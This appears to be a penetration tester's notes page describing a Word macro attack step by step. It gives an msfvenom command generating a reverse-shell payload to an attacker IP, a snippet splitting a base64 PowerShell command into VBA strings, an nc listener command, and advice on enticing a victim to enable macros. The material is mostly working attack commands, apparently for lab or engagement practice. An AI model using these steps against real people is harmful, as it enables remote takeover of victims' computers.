MSOffice macro attack

Kinda of an outdated technique, better options available using metasploit / cobaltstrike

Using Macros for attacks, Open word --→ View --→ Macros

Create a new macro

We must save the containing document as either .docm or the older .doc format, which supports embedded macros, but must avoid the .docx format, which does not support them.

Save on Desktop

Click on EvilMacro and enable content to trigger the script

Macro triggers cmd.exe

#Using Powershell and a Base64 encoded payload to get a reverse shell

sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.177 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

Edit the EvilMacro

Since VBA as a limit on the length of strings we have to split the command into chunks before running the exploit.

#Python3 script

str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."

n = 50

for i in range(0, len(str), n):
     print "Str = Str + " + '"' + str[i:i+n] + '"'

#Insert the macro

Start a nc listener on port 4444

nc -nvlp 4444

You have to save the document as Word 1997-2003 Version as further versions are not vulnerable

Open the file and enable macros

In an engagement scenario the victim has to be enticed to click on it and enable macros(unlikely)

Catch the revshell

Previousmsfvenom hta attackNextMetasploit Office Macro

Last updated